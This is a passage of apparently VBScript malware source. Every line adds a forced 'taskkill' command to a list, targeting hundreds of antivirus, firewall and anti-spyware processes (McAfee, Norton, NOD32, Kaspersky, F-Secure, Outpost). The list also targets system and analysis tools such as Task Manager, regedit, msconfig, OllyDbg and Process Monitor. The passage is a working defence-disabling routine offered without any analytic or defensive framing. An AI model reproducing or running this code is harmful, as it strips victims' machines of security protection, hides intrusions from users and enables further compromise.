    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win_trial.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsaa.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530stbyb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530wtbyb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsgk32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsm32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsma32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsmb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gator.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbmenu.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbpoll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""generics.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""gmt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""guard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""guarddog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hacktracersetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbinst.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbsrv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotactio.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotpatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""htlog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""htpatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hwpe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxdl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxiul.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamstats.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""idle.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedriver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iexplorer.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ifw2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""inetlnfo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""infus.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""infwin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""init.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""intdel.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""intren.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""istsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jammer.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jdbgmrg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavlite40eng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpers40eng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kavpf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kazza.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""keenvalue.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-pf-213-en-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrl-421-en-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kerio-wrp-421-en-win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""kernel32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""killprocesssetup161.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""launcher.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldnetmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpro.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldpromenu.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ldscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lnetinfo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""loader.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""localnet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lordpe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luau.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""lucomserver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luinit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""luspt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mapisvc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcmnhdlr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcshield.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mctool.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsrte.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mcvsshld.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""md.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfw2en.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mfweng3.02d30.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrtcl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgavrte.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mghtml.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mgui.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""minilog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mmod.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""monitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mostat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpfservice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mrflux.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msbb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msblast.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscache.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msccn32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mscman.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msconfig.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msdos.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msiexec16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msinfo32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mslaugh.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmgt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msmsgri32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssmmc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mssys.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""msvxd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mu0311ad.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""mwatch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nav.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navap.navapsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapsvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navdx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navstub.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nc2000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ncinst4.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ndd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""neomonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""neowatchlog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netarmor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netd32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netinfo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netscanpro.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netspyhunter-1.2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netstat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""netutils.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nod32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""norton_internet_secu_3.0_407.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""notstart.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npf40_tw_98_nt_me_2k.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npfmessenger.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nprotect.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npscheck.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""npssvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsched32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nssys32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nstask32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nsupdate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntrtscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntvdm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ntxconfig.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nui.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvarch16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvsvc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwinst4.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwservice.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""nwtool16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ollydbg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""onsrvr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""optimize.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ostronet.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""otfix.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostinstall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpostproinstall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""panixk.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""patch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavproxy.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcip10117_0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pdsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""periscope.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""perswf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pf2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pfwadmin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pgmonitr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pingscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""platin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pop3trap.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""poproxy.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""popscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""portdetective.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""portmonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""powerscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppinupdt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pptbc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ppvstop.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""prizesurfer.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""prmvr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""procdump.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""processmonitor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""procexplorerv1.0.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""programauditor.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""proport.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""protectx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""pspf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""purge.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""qconsole.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""qserver.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rapapp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav8win32eng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rb32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rcsync.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""realmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""reged.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""regedt32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rrguard.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rshell.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rtvscn95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rulaunch.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""run32dll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""rundll16.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ruxdll32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sahagent.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""save.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""savenow.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sbserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scam32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""setup_flowprotector_us.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""setupvameeval.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sfc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sgssfw32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sh.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""shellspyinstall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""shn.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""showbehind.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sms.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""smss32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""soap.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sofi.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sperm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spf.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoler.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolcv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spoolsv32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""spyxx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""srexe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""srng.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ss3edit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssg_4104.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""ssgrate.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""st2.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""start.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""stcloader.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""supftrl.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""support.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""supporter5.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchostc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svchosts.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""svshost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweepnet.sweepsrv.sys.swnetsup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""symproxysvc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""symtray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysedit.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""system.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""system32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""sysupd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmg.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmgr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmo.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taskmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""taumon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tc.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tcm.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds-3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""teekids.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tfak5.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tgbob.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""titanin.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""titaninxp.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tracert.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trickler.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjscan.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trjsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""trojantrap3.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tsadbot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvmd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""tvtmd.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""undoboot.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""updat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""update.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""upgrad.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""utpost.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcmserv.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbcons.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbust.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwin9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vbwinntw.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vcsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vfsetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vir-help.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""virusmdpersonalfirewall.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnlan300.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vnpc3000.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpc42.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vpfw30s.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vptray.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscenu6.02d30.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsched.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsisetup.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmain.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsmon.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswin9xe.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinntse.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""vswinperse.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""w32dsm89.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""w9x.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""watchdog.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webdav.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""webtrap.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""whoswatchingme.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""wimmun32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32.exe"""
    Build_Cmd_List arrayCmds, "taskkill /F /IM ""win32us.exe"""
